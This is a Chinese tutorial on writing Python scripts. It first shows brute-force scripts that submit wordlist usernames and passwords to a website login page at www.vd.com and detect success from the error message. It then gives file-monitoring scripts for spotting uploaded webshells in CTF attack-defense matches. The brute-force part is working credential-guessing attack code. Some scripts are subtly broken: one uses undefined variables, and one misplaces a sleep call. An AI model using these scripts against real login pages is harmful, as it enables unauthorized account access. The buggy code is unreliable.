爆破脚本：

爆破脚本也是我们经常使用的东西

这里就简单讲讲后台爆破脚本的编写吧

在编写之前，我们先通过访问网站去看看情况

首先我们可以先登录看看

输入账号 admin ，密码 12345 后

登录失败，提示 用户名或密码错误

---

在输入正确的密码 123456 后，则会跳到用户界面

然后我们可以通过这个信息去判断是否登录成功

---

现在我们有了登录密码，有了判断是否登录成功的信息

还有就是如何构造 post 包

我们可以先用 burp 抓一下看看

现在我们可以看到，这些数据发送到了 /user/logCheck.php 的页面，

很明显这是判断用户名和密码的，

POST 数据为 user=admin&pass=123456&submit=login

---

有了这些信息，就可以写脚本了，

脚本其实跟前面的一些类似，无非就是判断不同

直接来看代码

假设我们知道用户名为 admin ，

那么我们可以直接爆破密码，

使用 format() 函数把密码传进去

# -*- coding: utf-8 -*-

import requests
import time
import re

def login(pwd):

	try:
		headers = {

			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0",
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
			"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"

		}

		url = "http://www.vd.com/user/logCheck.php"

		login = {"user":"admin","pass":"{}".format(pwd),"submit":"login"}

		r = requests.post(url,headers=headers,data=login)

		r.encoding = 'utf-8'

		if '用户名或密码错误' in r.text:

			print("用户名: " +user+ " 密码: " + pwd +" -----> 登录失败")

		else:

			print("用户名: " +user+ " 密码: " + pwd + " -----> 登录成功")

	except:
		print("用户名: " +user+ " 密码: " + pwd + " -----> 无法访问")

password = open('D:/top100.txt','r')

for pwd in password.readlines():

	pwd = pwd.strip('\n')
	login(pwd)


username.close()

下面是运行结果

---

假设用户名也不知道，那么我们也可以连用户名也一起爆破，

给用户名也加一个 format() 就行了

下面是代码

使用 for 循环来传入用户名和密码进行爆破

import requests
import time
import re

def login(user,pwd):

	try:
		headers = {

			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0",
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
			"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"

		}

		url = "http://www.vd.com/user/logCheck.php"

		login = {"user":"{}".format(user),"pass":"{}".format(pwd),"submit":"login"}

		r = requests.post(url,headers=headers,data=login)

		r.encoding = 'utf-8'

		if '用户名或密码错误' in r.text:

			print("用户名: " +user+ " 密码: " + pwd +" -----> 登录失败")

		else:

			print("用户名: " +user+ " 密码: " + pwd + " -----> 登录成功")

	except:
		print("用户名: " +user+ " 密码: " + pwd + " -----> 无法访问")

username = open('D:/user.txt','r')

for user in username.readlines():
	user = user.strip('\n')
	password = open('D:/top100.txt','r')
	
	for pwd in password.readlines():

		pwd = pwd.strip('\n')
		login(user,pwd)


username.close()
password.close()

运行结果

验证完 admin 就验证 root

---

文件监控：

在ctf线下赛中，经常会遇到文件上传漏洞，

那么在我们不会修复漏洞的情况下，就会被挂马 getshell了，

然而我们即使知道上传的文件在哪里，

那么也不可能一直守着那个文件夹删除文件，

你删除也没有别人的脚本操作快，你删除时别人已经 getflag 了，

在这种情况下，我们就需要一个文件监控脚本来帮助我们去完成这个操作。

---

编写思路：

先获取原文件夹里的文件，做一个白名单，

然后监控是否有新增文件

---

方法一：

先来看看代码，编写思路是这样子的，

将要监控的文件夹复制到其他地方，当作一个白名单，

然后重复比对这两个文件夹里面的内容，

如果在白名单上没有的，那么就是新增的文件，

下面是一个纯监控脚本，如需要后续操作，比如删除，可自行添加

import os
import shutil
import time

def backup(path1,path2):

	global file_list

	if os.path.isdir(path2):  # 判断白名单文件夹是否存在

		file_list = os.listdir(path2)   # 白名单文件

	else:

		shutil.copytree(path1,path2)   # 将 path1 文件复制到 path2 作为白名单
		file_list = os.listdir(path2)  # 白名单文件

def checkfile(file_list):

	while 1:

		check_file = os.listdir(path1)  # 要监控的文件夹
			
		tmp = [file for file in check_file if not file in file_list] # 列表推导式，获取差集

		if tmp: # 判断是否有新增文件
			for file in tmp:
				print('发现新文件 -----> ' + file)
				file_list.append(str(file))       # 避免重复输出
		else:
			pass

	# print(tmp)

	time.sleep(3)  # 每3秒循环一次

if __name__ == '__main__':

	path1 = 'D:/123'  # 要监控的文件夹，123为文件夹名字
	path2 = 'E:/123'  # 白名单路径，123为文件夹名字
	backup(path1,path2)
	checkfile(file_list)

最后效果就是这样子的

---

除了列表推导式，我们还可以用其他方法获取差集，

那就是使用 difference() 函数，

这种方式比列表推导式更高效

代码其实都差不多，这里就不做更多的介绍了

import os
import shutil
import time

def backup(path1,path2):

	global file_list

	if os.path.isdir(path2):  # 判断白名单文件夹是否存在

		file_list = os.listdir(path2)   # 白名单文件

	else:

		shutil.copytree(path1,path2)   # 将 path1 文件复制到 path2 作为白名单
		file_list = os.listdir(path2)  # 白名单文件

def checkfile(file_list):

	while 1:

		check_file = os.listdir(path1)  # 要监控的文件夹
			
		tmp = list(set(check_file).difference(set(file_list))) # 获取差集，check_file 中有，而 file_list 中没有

		if tmp: # 判断是否有新增文件
			for file in tmp:
				print('发现新文件 -----> ' + file)
				file_list.append(str(file))       # 避免重复输出
		else:
			pass

	# print(tmp)

	time.sleep(3)  # 每3秒循环一次

if __name__ == '__main__':

	path1 = 'D:/123'  # 要监控的文件夹，123为文件夹名字
	path2 = 'E:/123'  # 白名单路径，123为文件夹名字
	backup(path1,path2)
	checkfile(file_list)

---

方法二：

方法一中复制文件夹到其他地方的方式颇为笨重 ，

如果要监控的目录文件非常多，那么就会非常不方便

下面这个方法，不需要复制文件夹也能实现监控效果，

在脚本第一次运行的时候获取一个初始文件列表 file_list

然后在第二次以及后面的运行中获取的文件作为 check_dir

然后再判断两个列表中是否有不相同的文件存在

脚本运行后，你往文件夹丢文件就能看到效果了，脚本默认是 3 秒检测一次。

import os
import time
	
def list_dir(filepath):
	
	global file_list	
	file_list = os.listdir(filepath)  # 获取初始文件列表，作为白名单

def checkfile(filepath):

	while 1:

	 	check_dir = os.listdir(filepath)  # 获取路径下的文件

	 	for file in check_dir:

	 		if str(file) not in str(file_list):
	 			print('发现新文件 -----> ' + file)
	 			file_list.append(str(file))
	 		else:
	 			pass

	 	time.sleep(3)  # 3秒循环一次


if __name__ == '__main__':

	filepath = 'D:/123'    # 要监控的目录路径，D盘下的123文件夹
	list_dir(filepath)
	checkfile(filepath)

效果呢，也是一样的

---

总结：